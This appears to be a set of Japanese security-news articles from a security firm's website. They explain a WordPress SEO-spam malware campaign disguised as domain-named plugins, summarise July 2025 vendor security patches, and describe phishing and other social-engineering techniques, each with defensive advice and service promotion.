ドメイン名偽装で検知を回避するWordPressマルウェアの脅威と対策

Share

Security NEWS TOPに戻る
バックナンバー TOPに戻る

瓦版号外(ドメイン名偽装で検知を回避するWordPressマルウェアの脅威と対策)

2025年7月、セキュリティ企業SucuriがWordPressを狙う新たなマルウェア攻撃を発見・公表しました。今回公表された「SEOスパム型WordPressプラグイン」による攻撃は従来の攻撃と比較して手口が巧妙化しており、世界中のWebサイト管理者にとって深刻な脅威となっています。本記事では、攻撃の手口と被害の特徴、そして有効な対策について解説します。

お問い合わせ

お問い合わせはこちらからお願いします。後ほど、担当者よりご連絡いたします。

攻撃手法

ドメイン偽装によるマルウェア検知回避

今回発見されたマルウェアは、感染したWordPressサイトのドメイン名をそのままプラグイン名やフォルダ名に偽装して設置されます。これにより、管理者や一般ユーザーがファイル一覧を確認しても、正規のプラグインと見分けがつきにくい構造になっています。この偽プラグインは高度に難読化されたコードで構成されており、セキュリティ対策ソフトによる検知も困難です。

検索エンジン限定のSEOスパム注入

SEOスパムの注入は、Googleなどの検索エンジンのクローラを検知した場合のみ実行されます。通常の訪問者には正規のページが表示されるため、管理者も異常に気付きにくく、発見が遅れる原因となります。検索エンジンのみにスパムコンテンツを返すことで、検索順位の操作や不正なトラフィック誘導が行われます。

C2サーバとの通信と外部指令の受信

この偽プラグインの内部には、base64で難読化されたC2(コマンド&コントロール)サーバ※ のドメイン情報が隠されています。偽プラグインは定期的にC2サーバへ外部リクエストを送り、攻撃者からの指示を受け取ります。これにより、スパム内容の動的な更新や追加のマルウェア配布など、攻撃の手口が柔軟に変化する仕組みが実装されています。

※C2(コマンド&コントロール)サーバ…サイバー攻撃者が外部から侵害システムと通信を行い、命令と制御を行う目的で用いられる。

マルウェアによる被害と影響

この種のマルウェアは、通常の利用者やサイト管理者が直接アクセスした場合には一切異常を示さないため、発見が遅れがちです。Googleなどの検索エンジン経由でのみスパムが表示されるため、被害に気付いたときにはすでに検索結果にスパムページが表示されていたり、検索順位が大幅に下落しているケースも多く、ブランドイメージや集客に深刻な影響を与えたりするおそれがあります。また今回の例は、WordPressのプラグインエコシステムを悪用したサプライチェーン攻撃の一例とも言えます。公式リポジトリを介さず、外部から導入されたプラグインやテーマを通じて感染が広がるため、信頼できる配布元からのみソフトウェアを導入することが重要です。

有効な対策と管理者が取るべき予防措置

Webサイト管理は特に以下のような対策を取り、異常が見られた場合は速やかに専門家へ相談することをおすすめします。

  • WordPressのプラグインやテーマは必ず公式リポジトリや信頼できるベンダーからのみ入手する
  • 不審なファイルや見覚えのないプラグインが存在しないか、定期的にサーバ内を確認する
  • セキュリティプラグインやWebアプリケーションファイアウォール(WAF)、管理画面への多要素認証を導入する
  • Google Search Console等で検索結果の異常を監視する

まとめ

SEOスパム型の偽装WordPressプラグインは、検索エンジンのクローラを標的にしてスパムコンテンツを注入し、通常の訪問者には正規ページを返すという極めて巧妙な手口です。攻撃者は感染サイトのドメイン名をそのままプラグイン名やフォルダ名に偽装し、管理者の目を欺きます。さらに、コード内部にはbase64で難読化されたC2サーバ情報が隠され、外部からの指令に応じて動的にスパム内容を更新できる仕組みも組み込まれています。

このような手法は、発見が遅れやすく、検索順位の下落やサイトの信頼性低下など、経営や運営に深刻な影響を及ぼすリスクがあります。特に、公式リポジトリを介さないプラグインやテーマの導入が感染経路となるケースが多いため、日常的なセキュリティ意識と運用管理の徹底が不可欠です。

被害を最小限に抑えるためには、信頼できる配布元からのみソフトウェアを導入する、サーバ内の不審なファイルやプラグインを定期的に点検する、Google Search Consoleなどで検索結果の異常を監視するなど、複数の対策を組み合わせることが重要です。

BBSecでは:セキュリティソリューションの活用

高度なサプライチェーン攻撃や難読化マルウェアに対抗するため、ブロードバンドセキュリティでは多層防御の観点から次のようなソリューションを強くおすすめします。

エージェント型Webサイトコンテンツ改ざん検知サービス

WordPressサイトのファイルやディレクトリの改ざんをリアルタイムで監視し、異常があれば即座にアラートを発します。正規のプラグイン名を偽装した不審なファイルの追加や書き換えも検知しやすく、被害の早期発見に役立ちます。

https://www.bbsec.co.jp/service/vd-maintenance/manipulation.html
※外部サイトにリンクします。

脆弱性診断サービス

WordPress本体やプラグイン、テーマの設定や実装に潜む既知の脆弱性を定期的に洗い出すサービスです。悪用されやすい箇所を事前に把握し、攻撃の入り口を減らします。診断結果に基づき、不要なプラグインの削除や設定の見直しを行うことで、リスク低減につながります。

ペネトレーションテスト

実際の攻撃者の視点でお客様のシステムに実装済みのセキュリティを検証するサービスです。自動化された攻撃だけでなく、手動による高度な手法も用いるため、通常の診断では見つけにくいサプライチェーンリスクや運用上の盲点も洗い出すことが可能です。

これらのサービスを組み合わせて導入することで、巧妙化するマルウェア攻撃などへの対応力を大幅に高めることができます。BBSecとしては、エージェント型改ざん検知、脆弱性診断、ペネトレーションテストをパッケージ化した多層防御ソリューションを強くご提案いたします。これにより、WordPressサイト運営者の方が安心してビジネスを継続できる環境づくりをサポートいたします。ご希望の方には、無料相談や初回診断も承っております。お気軽にご相談ください。

お問い合わせ

お問い合わせはこちらからお願いします。後ほど、担当者よりご連絡いたします。

【参考情報】

ウェビナー開催のお知らせ

  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 2025年7月23日(水)14:00~15:00
    急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜
  • 2025年7月30日(水)13:00~13:50
    Webサイトの脆弱性はこう狙われる!OWASP Top 10で読み解く攻撃と対策
  • 2025年8月5日(火)14:00~15:00
    企業サイトオーナー向け ユーザーからのレピュテーションを高めるWebサイトの在り方-Webサイトを取り巻くリスク・規制・要請とユーザビリティ向上-
  • 最新情報はこちら

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。
    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。

    Security Serviceへのリンクバナー画像
    BBsecコーポレートサイトへのリンクバナー画像
    セキュリティ緊急対応のバナー画像

    【2025年7月最新】主要ITベンダーのセキュリティパッチ速報

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    2025年7月第2週は、Microsoft、AMD、Cisco、Fortinet、Android(Google)、Ivanti、SAPといった主要ITベンダーが相次いで月例・臨時のセキュリティパッチを公開しました。サイバー攻撃の脅威が高まる中、これらのセキュリティパッチは被害防止の第一歩です。本記事では、各社が公開している脆弱性による影響と、脆弱性を解消するアップデートの内容について簡潔にご紹介します。

    お問い合わせ

    お問い合わせはこちらからお願いします。後ほど、担当者よりご連絡いたします。

    Microsoft:ゼロデイ2件を含む大規模パッチ公開

    Microsoftは2025年7月の月例パッチ(Patch Tuesday)で、CVE-2025-49719を含むゼロデイ2件を含め、合計73件の脆弱性を修正しました。修正対象にはWindows OS、Microsoft Officeなど幅広い製品が含まれ、リモートコード実行(RCE)や権限昇格といった深刻な問題も含まれています。特にSPNEGO Extended Negotiation(NEGOEX)におけるRCEの脆弱性CVE-2025-4798は、ユーザー操作なしで攻撃が成立し、ワーム化のリスクも指摘されています。Microsoft Defender Vulnerability Managementのゼロデイ一覧も更新されており、速やかなパッチ適用が推奨されます。

    AMD,投機実行による情報漏えい「Transient Scheduler Attacks」

    AMDは、CPUの投機実行に起因する新たな情報漏えい攻撃「Transient Scheduler Attacks」(SB-7029)への緩和策を発表しました。今回の対策パッチは、主に最新世代のEPYCサーバー向けであり、古いZen 2/3世代のデスクトップCPUは対象外となっています。この脆弱性は、SEV-SNP(Secure Encrypted Virtualization – Secure Nested Paging)環境での機密性を損なう恐れがあり、BIOSおよびファームウェアのアップデートが必要です。OEM(Original Equipment Manufacturing)各社から配布される更新プログラムの適用と、再起動による有効化が求められます。

    Cisco,Fortinet:高リスクレベルのRCE脆弱性を告知

    CiscoとFortinetは、それぞれのPSIRT(Product Security Incident Response Team)で、複数の高リスクレベルのRCE脆弱性を公表しました。Ciscoは、PSIRTの情報公開体制を強化し、重大度(SIR)を明示したアドバイザリを発行しています。Fortinetも、月例PSIRTアドバイザリで高深刻度の脆弱性を公表し、セキュリティファブリック全体の保護強化を図っています。両社とも、公開された脆弱性情報をもとに、早急なパッチ適用を推奨しています。

    Google: Security Bulletinで36件修正

    Googleは2025年7月1日付でAndroid Security Bulletinを公開し、Pixel端末向けに36件の脆弱性を修正しました。内容には、QualcommやMediaTekのチップセットに関するサードパーティ由来の脆弱性も含まれています。特に、QualcommのGPSコンポーネントにおけるCVE-2025-21450(CVSSスコア9.1)は深刻度が高く、Android端末利用者はアップデートの有無を必ず確認しましょう。

    Ivanti,SAP:業務システムの脆弱性へのパッチ

    Ivantiは7月8日にConnect SecureおよびPolicy Secure向けに複数の脆弱性修正パッチをリリースしました。主な内容は、認証バイパスやバッファオーバーフローなどで、管理者権限を持つ攻撃者によるサービス妨害や設定改ざんのリスクが指摘されています。SAPも7月9日に月例セキュリティノートを公開し、27件の新規パッチ3件の既存ノート更新を実施。中でもCVE-2025-30009ほか、CVSSスコア最大10.0のクリティカルなRCEおよびデシリアライゼーションの脆弱性が複数修正されています。ERPやS/4HANAなど基幹業務システム利用者は、速やかな適用が必須です。

    2025年7月のセキュリティ対策まとめ

    2025年7月第2週は、主要ITベンダーから多岐にわたるセキュリティアップデートが公開され、企業・個人問わず対策の重要性が再認識される週となりました。最後に、今月の動向と実践すべきセキュリティ対策をご紹介します。

    脆弱性・攻撃動向

    • ゼロデイ脆弱性の増加
      MicrosoftやAndroidなど複数のプラットフォームで、攻撃に悪用されたゼロデイ脆弱性が報告されています。これらは攻撃者にとって格好の標的となりやすく、公開直後から実際の攻撃が観測されるケースも増えています。
    • リモートコード実行(RCE)脆弱性の深刻化
      CiscoやFortinetのネットワーク機器、SAPの基幹システムなどで、リモートから悪用可能な高深刻度RCE脆弱性が相次いで修正されています。これらの脆弱性は、ネットワーク経由で攻撃を受けるリスクが高く、企業インフラ全体の安全性に直結します。
    • サプライチェーンや業務システムへの波及
      IvantiやSAPなど、業務システムや管理ツールにも重要な脆弱性が報告されており、サプライチェーン全体のセキュリティ確保が不可欠です。

    被害を防ぐために企業・個人が取るべき実践的対策

    • 定期的なパッチ適用の徹底
      OSやアプリケーション、ネットワーク機器、業務システムなど、利用中の全てのソフトウェアについて、最新のセキュリティアップデートを速やかに適用してください。パッチ適用の遅れは、被害拡大のリスクを大きく高めます。
    • 脆弱性情報の継続的な収集と確認
      Microsoft、AMD、Cisco、Fortinet、Google(Android)、Ivanti、SAPなど、主要ベンダーの公式アドバイザリやセキュリティノートを定期的にチェックし、脆弱性情報に敏感になりましょう。
    • バックアップとインシデント対応体制の強化
      万が一の被害に備え、重要データの定期バックアップや、インシデント発生時の対応手順(CSIRT体制など)を整備しておくことも重要です。
    • ゼロトラストや多層防御の導入検討
      攻撃の高度化に備え、ゼロトラストや多層防御(Defense in Depth)など、従来型の境界防御に依存しないセキュリティ対策の導入も推奨されます。

    さいごに:2025年7月のアップデートを受け

    2025年7月は、WindowsやOffice、Androidに加え、ネットワーク機器や業務システムといった幅広い分野で深刻な脆弱性が多数公開されました。中にはゼロデイ脆弱性やリモートコード実行(RCE)など、攻撃リスクの極めて高い問題も含まれており、早期対応が求められます。これらのリスクに対処するためには、パッチの速やかな適用、最新の脆弱性情報の収集、そしてインシデント対応体制の強化という3本柱で、継続的なセキュリティ対策を講じ、被害防止に努めることが不可欠です。今後も各ベンダーから公開される最新情報を継続的にチェックし、早期の対策と体制強化を心がけてください。

    【参考情報】

  • Microsoft Defender Vulnerability Management ゼロデイ一覧
    https://learn.microsoft.com/en-us/defender-vulnerability-management/tvm-zero-day-vulnerabilities
  • Microsoft 月例パッチ詳細(例:CVE-2025-49719 など)
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49719
  • AMD セキュリティ情報(SB-7029およびSEV-SNP緩和)
    https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7029.html
  • Cisco PSIRT アドバイザリ一覧
    https://sec.cloudapps.cisco.com/security/center/publicationListing.x
  • Fortinet PSIRT アドバイザリ一覧
    https://www.fortiguard.com/psirt
  • Android Security Bulletin(2025年7月)
    https://source.android.com/docs/security/bulletin/2025-07-01
  • Ivanti 2025年7月セキュリティアップデート
    https://www.ivanti.com/blog/july-security-update-2025
  • SAP Security Notes(2025年7月)
    https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
  • 【2025年7月に解消された脆弱性一覧】

    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49719
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49704
    https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7029.html
    https://www.microsoft.com/en-us/research/publication/enter-exit-page-fault-leak-testing-isolation-boundaries-for-microarchitectural-leaks/
    https://sec.cloudapps.cisco.com/security/center/publicationListing.x
    https://www.fortiguard.com/psirt
    https://source.android.com/docs/security/bulletin/2025-06-01
    https://source.android.com/docs/security/bulletin/2025-07-01
    https://www.ivanti.com/blog/july-security-update-2025
    https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
    https://www.cve.org/CVERecord?id=CVE-2025-30012
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-36357
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-36350
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47988
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49690
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48816
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49675
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49677
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49694
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49693
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47178
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49732
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49742
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49744
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49687
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47991
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47972
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48806
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48805
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47994
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49697
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49695
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49696
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49699
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49702
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48812
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49711
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49705
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49701
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49706
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49703
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49698
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49700
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47993
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49738
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49731
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49737
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49730
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49685
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49756
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48817
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-33054
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48822
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47999
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48002
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-21195
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49718
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49717
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49684
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47986
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47971
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49689
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49683
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47973
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49739
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-27614
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-27613
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-46334
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-46835
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48384
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48386
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48385
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49714
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49661
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48820
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48818
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48001
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48804
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48003
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48800
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48000
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49724
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47987
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48823
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47985
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49660
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49721
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47984
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47980
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49735
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47978
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49666
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26636
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48809
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48808
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47996
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49682
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49691
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49716
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49726
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49725
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49678
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49680
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49722
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48814
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49688
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49676
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49672
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49670
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49671
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49753
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49729
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49673
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49674
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49669
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49663
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49668
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49681
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49657
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47998
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48824
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48810
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49679
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49740
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48802
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47981
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47976
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47975
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48815
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49723
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49760
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47982
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49686
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49658
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49659
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48821
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48819
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48799
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49664
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47159
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48811
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-48803
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49727
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49733
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49667
    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49665

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 2025年7月23日(水)14:00~15:00
    急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜
  • 2025年7月30日(水)13:00~13:50
    Webサイトの脆弱性はこう狙われる!OWASP Top 10で読み解く攻撃と対策
  • 2025年8月5日(火)14:00~15:00
    企業サイトオーナー向け ユーザーからのレピュテーションを高めるWebサイトの在り方-Webサイトを取り巻くリスク・規制・要請とユーザビリティ向上-
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像

    ソーシャルエンジニアリング最前線
    【第3回】フィッシングメールの最新トレンドとソーシャルエンジニアリング攻撃の手口

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    【関連ウェビナー開催情報】
    弊社では7月23日(水)14:00より、「急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜」と題したウェビナーを開催予定です。多要素認証や従業員教育、技術的防御など多層的なアプローチに加え、当社ソリューションによる効果的な防御手法もご紹介します。ご関心がおありでしたらぜひお申込みください。詳細はこちら

    本シリーズでは、「ソーシャルエンジニアリング最前線」として、2025年6月現在のフィッシングに代表されるソーシャルエンジニアリングに関する動向と企業・個人が取れる対策をまとめます。第3回はフィッシングを含めたソーシャルエンジニアリング攻撃の目的、最近話題の手口についてまとめます。

    ソーシャルエンジニアリング攻撃の目的と心理的手口

    ソーシャルエンジニアリング攻撃は攻撃者が被害者の心理や認知機能のバグを悪用したハッキング技法であることは第1回で紹介した通りです。ここではどんな手口でソーシャルエンジニアリング攻撃が仕掛けられるかを解説します。

    最も多いソーシャルエンジニアリングの手口「フィッシング」

    ソーシャルエンジニアリング攻撃で最も知られている手口はフィッシングでしょう。

    フィッシングメールの種類

    フィッシングといわれて最初に思い浮かべるフィッシングメールはフィッシングの一形態にあたります。フィッシングメールにもさまざまな種類があります。

    • フィッシングメールにマルウェアやマルウェアのダウンロードを行うアプリケーションを添付
      メールサービスやPCの機能などで検知しやすいことでも知られる
    • フィッシングメールにリンクを挿入し、リンク先から個人情報や認証情報を盗む、またはマルウェアのダウンロードを行う
      最近見られる手法にMicrosoft 365やGoogle Workspaceのログイン画面を精緻に再現した偽画面を使ったAiTMがある。日本国内で3月から5月にかけて問題となった証券口座への不正アクセス・不正取引事件も多くはこの手法を用いられたものと考えられる
    • 組織のコントロール外のサービスへ誘導し、マルウェアのダウンロードを行う
      会社のPCで求人サイトにアクセスし、会社で使用しているアカウントでGitHubにログインした状態で偽の採用担当者から指示された通り、コードを実行した結果暗号資産が盗難される事件などが発生している

    さて、最近ではフィッシングもメールだけのものではなくなりました。

    SMSを悪用した「Smishing(スミッシング)」

    スミッシングはSMSで行われるフィッシングです。皆さまがよく知るものでは宅配事業者の不在配達通知のSMSによるスミッシングがこれに該当します。

    QRコード型フィッシング「Quishing(クイッシング)」

    街中でお店のメニューやお店のSNS、レンタルのためなどいろいろなところで見かけるQRコードですが、このQRコードが偽のログイン画面や偽の決済画面にリンクしているものをQuishing(クイッシング)といいます。イギリスの例では、駐車場の支払機にあるQRコードからアプリケーションのダウンロードを促されてアプリケーションをダウンロードした際、銀行口座の詳細確認のために90ペンス(約176円)の手数料に同意したところ、年間39ポンド(約7,600円)の払い戻し条件なしのサブスクリプションサービスを契約させられていたケース 注 1)もあります。

    当初の被害が小さい(前述の例は90ペンス)ことなどから気付いても通報に至らないこと、決済情報や個人情報をQRコードでアクセスしたサイトで入力しているケースが多く、あとから詐欺に再度遭うこともあります。また、1人だけの被害であれば少額ですが、同じような被害者が数十人、数百人いるとさらに被害は拡大します。日本では現時点では一般的な手口ではありませんが、技術をさほど必要としない点を考慮すると同じ手口が流布する可能性が十分ある点に注意が必要でしょう。

    フィッシング・スミッシング・クイッシングの共通対策とは?

    フィッシング、スミッシング、クイッシングに共通する個人レベルの対策法は公式アプリ、公式サイト(ブックマーク)からのアクセスを心掛けることです。また、企業から貸与された端末経由でマルウェアのダウンロードをされるケースもあることから、企業から貸与された端末は目的外で使用しないことを徹底することも重要です。

    音声通話を悪用する「Vishing(ビッシング)」

    こちらは「声」によるフィッシング、Vishing(ビッシング)です。日本国内の被害事例としては2025年3月に山形鉄道が地元銀行を騙る自動音声の電話から誘導され、インターネットバンキングを経由し、およそ1億円の詐欺被害に遭った事例があります。

    インターネットバンキングによる送金詐欺以外には自動音声との組み合わせによるテクニカルサポート詐欺などがあります。また、最近では警察を騙る自動音声通話なども報告されています 注 2)。基本的に自動音声でかかってくる電話はビッシングを疑ったほうがよいのが現状です。いったん電話を切ってから警察相談専用電話#9110や消費者ホットライン188に相談しましょう。

    生成AIの進化で加速化するフィッシング手法

    フィッシング全般に共通しますが、数年前であればフィッシングメールやSMSの文面の日本語がたどたどしかったり、日本語で使われない漢字が使用されたりといった違和感から怪しさに気付けたのですが、ここ1年ほどは生成AIの発展により、日本語のテキストからたどたどしさや違和感が急速に消えています。第2回で取り上げたフィッシングメールも文法や語彙としておかしな箇所は非常に少なく、注意力が低下しているときや慌てているときであれば気付かないかもしれないという危機感を抱くレベルです。最近ではアメリカFBIが政府高官のディープフェイクによる音声メッセージについて警告を発したり 注 3)、実際にアメリカ政府高官の顔写真などからAIが生成した音声を悪用したりする事例 注 4)が報告されています。文章によるフィッシングだけではなく、音声や画像、動画によるフィッシングについても、今後は警戒する必要があるでしょう。また、生成AIでWebページを生成するサービスも出現しています。一部のサービスには脆弱性があり、生成・公開されたページからユーザの情報やAIサービスのAPIキーなどの漏洩が可能という問題があります。

    なお、このサービスでWebページを作るにはプロンプトを入力すればよいだけなので、ページによっては10~15分程度でフォームも含めて立ち上げることが可能です。また、サービスによってはAiTM用のなりすましページの作成などに制限もかからない可能性があり、生成AIによるソーシャルエンジニアリング攻撃への影響は多大なものがあります。

    マルバタイジング(悪意ある広告)によるフィッシングの脅威

    広告を介したソーシャルエンジニアリングをご存じでしょうか。一般的にはマルバタイジング(Malvertising)と呼ばれる手法で、広告から誘導する先が悪意のあるWebサイトである場合を指します。例えば以下のような事例があります。

    • 違法なストリーミングサイトに埋め込まれたマルバタイジングのリダイレクタからマルウェアが複数段に分けてダウンロードされ、認証情報が盗み取られた事例 注 5)
